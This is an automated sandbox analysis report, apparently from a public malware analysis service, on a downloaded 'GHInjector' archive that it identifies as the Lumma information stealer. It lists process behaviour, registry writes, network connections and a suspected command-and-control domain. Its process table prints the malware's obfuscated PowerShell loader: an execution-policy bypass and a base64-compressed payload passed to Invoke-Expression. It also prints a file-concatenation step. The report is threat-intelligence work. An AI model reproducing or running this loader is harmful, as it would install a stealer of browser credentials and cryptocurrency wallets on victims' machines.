| URL: | https://qiwi.gg/file/uXg25809-GHInjector |
| Full analysis: | https://app.any.run/tasks/d1b20fd4-44c1-43a1-ba9b-9b84812a3a9d |
| Verdict: | Malicious activity |
| Threats: | Lumma is an information stealer, developed using the C programming language. It is offered for sale as a malware-as-a-service, with several plans available. It usually targets cryptocurrency wallets, login credentials, and other sensitive information on a compromised system. The malicious software regularly gets updates that improve and expand its functionality, making it a serious stealer threat. |
| Analysis date: | December 13, 2024, 00:15:47 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MD5: | 7C7C740E6BD7D27C1C4579CCB80FC89E |
| SHA1: | 83F9886947DDC969EBDB6B4903E6308918D59541 |
| SHA256: | 55987DEEC1AC6E73580F013FD0E2604C8F27DD785B97C277A9CE58CEAE7EA99B |
| SSDEEP: | 3:N8SKBfY8WAGsX:2SKBNWAV |
MALICIOUS
Executing a file with an untrusted certificate
- SetUp.exe (PID: 7860)
Actions looks like stealing of personal data
- Looks.com (PID: 7428)
Bypass execution policy to execute commands
- powershell.exe (PID: 1224)
Steals credentials from Web Browsers
- Looks.com (PID: 7428)
LUMMA has been detected (SURICATA)
- svchost.exe (PID: 2192)
Changes powershell execution policy (Bypass)
- Looks.com (PID: 7428)
Stealers network behavior
- svchost.exe (PID: 2192)
SUSPICIOUS
Application launched itself
- WinRAR.exe (PID: 3040)
- cmd.exe (PID: 8180)
Reads security settings of Internet Explorer
- WinRAR.exe (PID: 3040)
- WinRAR.exe (PID: 8048)
- SetUp.exe (PID: 7860)
Starts CMD.EXE for commands execution
- SetUp.exe (PID: 7860)
- cmd.exe (PID: 8180)
Executing commands from ".cmd" file
- SetUp.exe (PID: 7860)
Starts application with an unusual extension
- cmd.exe (PID: 8180)
Get information on the list of running processes
- cmd.exe (PID: 8180)
The executable file from the user directory is run by the CMD process
- Looks.com (PID: 7428)
Starts the AutoIt3 executable file
- cmd.exe (PID: 8180)
Using 'findstr.exe' to search for text patterns in files and output
- cmd.exe (PID: 8180)
Executable content was dropped or overwritten
- cmd.exe (PID: 8180)
Starts POWERSHELL.EXE for commands execution
- Looks.com (PID: 7428)
Contacting a server suspected of hosting an CnC
- svchost.exe (PID: 2192)
Uses base64 encoding (POWERSHELL)
- powershell.exe (PID: 1224)
INFO
Application launched itself
- msedge.exe (PID: 2828)
Checks supported languages
- identity_helper.exe (PID: 2072)
- Looks.com (PID: 7428)
- SetUp.exe (PID: 7860)
The process uses the downloaded file
- msedge.exe (PID: 4132)
- msedge.exe (PID: 2828)
- WinRAR.exe (PID: 3040)
- WinRAR.exe (PID: 8048)
- SetUp.exe (PID: 7860)
Reads Microsoft Office registry keys
- msedge.exe (PID: 2828)
Reads Environment values
- identity_helper.exe (PID: 2072)
Reads the computer name
- identity_helper.exe (PID: 2072)
- Looks.com (PID: 7428)
- SetUp.exe (PID: 7860)
Create files in a temporary directory
- SetUp.exe (PID: 7860)
Creates a new folder
- cmd.exe (PID: 7216)
Reads the software policy settings
- Looks.com (PID: 7428)
Reads mouse settings
- Looks.com (PID: 7428)
Checks proxy server information
- powershell.exe (PID: 1224)
Disables trace logs
- powershell.exe (PID: 1224)
Process checks computer location settings
- SetUp.exe (PID: 7860)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Total processes
198
Monitored processes
68
Malicious processes
5
Suspicious processes
2
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 204 | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5372 --field-trial-handle=2396,i,14364207693762184728,10814916070572624312,262144 --variations-seed-version /prefetch:8 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Exit code: 0 Version: 122.0.2365.59 Modules
| |||||||||||||||
| 1144 | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6864 --field-trial-handle=2396,i,14364207693762184728,10814916070572624312,262144 --variations-seed-version /prefetch:8 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Exit code: 0 Version: 122.0.2365.59 Modules
| |||||||||||||||
| 1224 | powershell -exec bypass -COm " &( $PShOmE[21]+$PSHoMe[30]+'X') ( nEw-OBJeCt SysTEM.io.cOmprEssIon.DeFLATEstREAM([iO.meMORystream] [cONVeRt]::frOMbASE64stRinG('ZVb9b9pIEP29Uv+HFUIxXGMXkuu1R9VKhiyJVWNocEJ71aljzAY28deZJZRy/t9vZs2HuSL5U7tv3ryZeabee7Nuy/sP7JvaZOLvRm17UWxbxbZdbC+LGjMfmCE+DXPj3JB4jL8ufTGwZGotBT7OZWI0GXvP8DfmyrwPcieYRoKxSS99ZKzxzf+a8R1om3BrBLiSV7iZx9a8hFQI0iSUush6b9+lHxg7bNS7kAoi4F5jQzvwKElktrrBBw1AJMZCmc/2rbSnLmcsnrdczWGXWJtAtr/vAGtm3+gT2mbsE5uB5Qzx6kSUmEWM3rP6dhzmDmSqC9EQep8K9oFtX76gdOvbnw6M4C6P6GWZ4VtNFMO8K7ZvdJg/8bGlY/6hxTQWKaLTsVAqW3bwJvshnvESWIriLvH0g+5ev36KSPFHSXyy1zJR38Mow/vvy4XR3JOYiCn0wJU88YnH2UGxi13x1uZw+oi7PIIRISmFa1qaYElWa1IuHpO8tHDaw9MEj0iKRGmJRWx5QlnH0H+Bk8EsUDYFrm/XogshEgHPLywMcVkcmWDiVwGiJFEazPCq6OEqXRtNy0me0yfRQDgJo1XuFoi/jzDg8TCHzRL8WxHEFMaq5oeomJvQya1NvOyza2vFL0n0cikmWyY4ELrieIrTfDNWOT1Tarr2JH4Ql+Xfc4hFPITbr4BrgdtxcWBQAkpFCJP8JBMUZmaDbxfnrHVOSjmjGdj4bNVcnsC1v6gd8AfAB0gFMMmc24MKPqYnnoiuOIIjHGvMHdYwno1Xhp1LOndd3um9mbTxXj4bzaZVu7chWvFap1ObCpg7Sa0i6l0iP98Bh37qzsQteGDHgqRlDXbNfRphGXRphNfhEEfYfA4i1ux0yqZp7xvL8KhT1td4XsnZkWDT+qUDU5SOOpmmLJlXlu4ZBaPRLAA/GKFGN5oKGsGIjOA0LEbtpVSeKcEloqo59+AeOjSkgRtkKL8i9TFbz/kMdwL6Q/cKeO5RsrvAZ1Vb0kyxERDYdMqOwl4yR4FaEEPIsNURM8PngpkOriRXYdVmMBTWkfpa5iKkzf00DwX7VzdtNZCxiiJqO5M0HK6MSnEUjyED7BfUQu20aLA5L20t6LpYlwZO6CuDjHJYFhtsVxe74t275kx244yyTatqCVSrowTEIxSpVl8l8p+V6KfRTOReEAvrp8z2Hcrq8XUr0uD6k3CcvSjqlq1/bmyUoNnBYbCrYRTweETJYHVvdDliAbrbafJg1+0Hwoaf2oiS58Gm0iUVdZawEJFb8YGLY+3QCEK1KxzWcEgFwLSH+j07tNFlxe+MMcKRx5HBZpEMAyXJmi1ikVSMDo3+AVL3SuSl1S0XAqLoSL4UhBmeNg9tMVkQnvQnNowubAb0zSoO2DPgOPkOeLYvU4+G8hBlDDccs7V+mTwyTx3olygBjLIrFBvKRj1G4eQvMgGKgiNP04Bh/uembNcr2YY+qvkJMlYRd4E747enFqhNk+ahUrJzdtHCvwXHwgn4AbwvI77cF++yOEmKGWZvQR0UzRyqoh7Ea6FOZhBtwtYuAT4NIeIpkbPfLAFfODNvRbjKl6IM+ZDmIggXrKFj8wfAz3rBZKK5fEHzk64YF839x5x+O1anE5SnIWmypCRzZY6otPjxauroYsdMfOF9BzCAVXtYuS6QyeB2L8VenMhklq6ZOQmkKmMVJIs+nemWDnOZ+dAl63oq2Ed858Gdi/8qLj6etV+++A8=' ) , [io.coMPREssioN.cOMpREssionMODe]::dEcoMPress ) | foREaCh {nEw-OBJeCt Io.stReamREadER( $_,[SyStEM.tEXt.EnCoDinG]::ASciI) } ).ReadTOeND( )" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Looks.com | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1556 | choice /d y /t 5 | C:\Windows\SysWOW64\choice.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Offers the user a choice Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1580 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Downloads\!!S𝓪t-Up@__4860--!Pa𝓢$Ć0𝓓𝕖#!.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | msedge.exe | |||||||||||
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.91.0 Modules
| |||||||||||||||
| 1760 | cmd /c copy /b ..\Sticker + ..\Rx + ..\Sheffield + ..\Mexico + ..\Liabilities + ..\Gi v | C:\Windows\SysWOW64\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2072 | "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.59\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5648 --field-trial-handle=2396,i,14364207693762184728,10814916070572624312,262144 --variations-seed-version /prefetch:8 | C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.59\identity_helper.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: PWA Identity Proxy Host Exit code: 0 Version: 122.0.2365.59 Modules
| |||||||||||||||
| 2192 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2828 | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://qiwi.gg/file/uXg25809-GHInjector" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Edge Version: 122.0.2365.59 Modules
| |||||||||||||||
| 3040 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Downloads\!!S𝓪t-Up@__4860--!Pa𝓢$Ć0𝓓𝕖#!.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | msedge.exe | |||||||||||
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.91.0 Modules
| |||||||||||||||
Total events
17 637
Read events
17 565
Write events
72
Delete events
0
Modification events
| (PID) Process: | (2828) msedge.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon |
| Operation: | write | Name: | failed_count |
Value: 0 | |||
| (PID) Process: | (2828) msedge.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon |
| Operation: | write | Name: | state |
Value: 2 | |||
| (PID) Process: | (2828) msedge.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon |
| Operation: | write | Name: | state |
Value: 1 | |||
| (PID) Process: | (2828) msedge.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\StabilityMetrics |
| Operation: | write | Name: | user_experience_metrics.stability.exited_cleanly |
Value: 0 | |||
| (PID) Process: | (2828) msedge.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\EdgeUpdate\ClientStateMedium\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\LastWasDefault |
| Operation: | write | Name: | S-1-5-21-1693682860-607145093-2874071422-1001 |
Value: 82824904B2872F00 | |||
| (PID) Process: | (2828) msedge.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\EdgeUpdate\ClientStateMedium\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\LastWasDefault |
| Operation: | write | Name: | S-1-5-21-1693682860-607145093-2874071422-1001 |
Value: 80CE5504B2872F00 | |||
| (PID) Process: | (2828) msedge.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\328474 |
| Operation: | write | Name: | WindowTabManagerFileMappingId |
Value: {B82C6157-D76C-4E9B-918D-7008B85B8F52} | |||
| (PID) Process: | (2828) msedge.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\328474 |
| Operation: | write | Name: | WindowTabManagerFileMappingId |
Value: {B2427109-F310-4F87-BC68-7A563838A956} | |||
| (PID) Process: | (2828) msedge.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\328474 |
| Operation: | write | Name: | WindowTabManagerFileMappingId |
Value: {01C0DBD7-5ACB-4E95-8442-33B96642DEE3} | |||
| (PID) Process: | (2828) msedge.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\328474 |
| Operation: | write | Name: | WindowTabManagerFileMappingId |
Value: {284FEBAA-AB11-46E1-A33E-42AC7C80C252} | |||
Executable files
7
Suspicious files
205
Text files
45
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2828 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old~RF13522a.TMP | — | |
MD5:— | SHA256:— | |||
| 2828 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old~RF13522a.TMP | — | |
MD5:— | SHA256:— | |||
| 2828 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old | — | |
MD5:— | SHA256:— | |||
| 2828 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old~RF13522a.TMP | — | |
MD5:— | SHA256:— | |||
| 2828 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old | — | |
MD5:— | SHA256:— | |||
| 2828 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old~RF13522a.TMP | — | |
MD5:— | SHA256:— | |||
| 2828 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old | — | |
MD5:— | SHA256:— | |||
| 2828 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old~RF13523a.TMP | — | |
MD5:— | SHA256:— | |||
| 2828 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old | — | |
MD5:— | SHA256:— | |||
| 2828 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old | — | |
MD5:— | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
21
TCP/UDP connections
123
DNS requests
144
Threats
9
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
4712 | MoUsoCoreWorker.exe | GET | 200 | 2.16.241.19:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
1176 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
5064 | SearchApp.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | — | — | whitelisted |
6988 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D | unknown | — | — | whitelisted |
7620 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
7620 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
7404 | svchost.exe | GET | 206 | 23.48.23.7:80 | http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/9b9f8fb4-8a65-41e4-bda3-5416858f0aeb?P1=1734555590&P2=404&P3=2&P4=Q9rDM3R1b76m1%2fQtMSz%2fuwGYiZVUjKGqo32JSUMe6Tuc1FFaWwcDsagd2Nd%2fHexm1VwfCDuWXmZajmpObiC6CA%3d%3d | unknown | — | — | whitelisted |
7404 | svchost.exe | GET | 206 | 23.48.23.7:80 | http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/9b9f8fb4-8a65-41e4-bda3-5416858f0aeb?P1=1734555590&P2=404&P3=2&P4=Q9rDM3R1b76m1%2fQtMSz%2fuwGYiZVUjKGqo32JSUMe6Tuc1FFaWwcDsagd2Nd%2fHexm1VwfCDuWXmZajmpObiC6CA%3d%3d | unknown | — | — | whitelisted |
7404 | svchost.exe | GET | 206 | 23.48.23.7:80 | http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/9b9f8fb4-8a65-41e4-bda3-5416858f0aeb?P1=1734555590&P2=404&P3=2&P4=Q9rDM3R1b76m1%2fQtMSz%2fuwGYiZVUjKGqo32JSUMe6Tuc1FFaWwcDsagd2Nd%2fHexm1VwfCDuWXmZajmpObiC6CA%3d%3d | unknown | — | — | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
2040 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4712 | MoUsoCoreWorker.exe | 2.16.241.19:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
4712 | MoUsoCoreWorker.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
2828 | msedge.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
6448 | msedge.exe | 188.114.96.3:443 | qiwi.gg | — | — | unknown |
6448 | msedge.exe | 13.107.42.16:443 | config.edge.skype.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
6448 | msedge.exe | 13.107.246.45:443 | edge-mobile-static.azureedge.net | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
config.edge.skype.com |
| whitelisted |
qiwi.gg |
| unknown |
edge.microsoft.com |
| whitelisted |
business.bing.com |
| whitelisted |
edge-mobile-static.azureedge.net |
| whitelisted |
www.bing.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
6448 | msedge.exe | Misc activity | ET INFO File Sharing Related Domain in DNS Lookup (qiwi .gg) |
6448 | msedge.exe | Misc activity | ET INFO File Sharing Related Domain in DNS Lookup (qiwi .gg) |
6448 | msedge.exe | Misc activity | ET INFO File Sharing Related Domain in DNS Lookup (qiwi .gg) |
6448 | msedge.exe | Misc activity | ET INFO File Sharing Related Domain in DNS Lookup (qiwi .gg) |
6448 | msedge.exe | Potentially Bad Traffic | ET HUNTING File Sharing Related Domain (www .mediafire .com) in DNS Lookup |
6448 | msedge.exe | Potentially Bad Traffic | ET HUNTING File Sharing Related Domain (www .mediafire .com) in DNS Lookup |
6448 | msedge.exe | Potentially Bad Traffic | ET HUNTING File Sharing Related Domain in DNS Lookup (download .mediafire .com) |
6448 | msedge.exe | Potentially Bad Traffic | ET HUNTING File Sharing Related Domain in DNS Lookup (download .mediafire .com) |
2192 | svchost.exe | Domain Observed Used for C2 Detected | STEALER [ANY.RUN] Suspected Lumma domain by CrossDomain (klipcatepiu0 .shop) |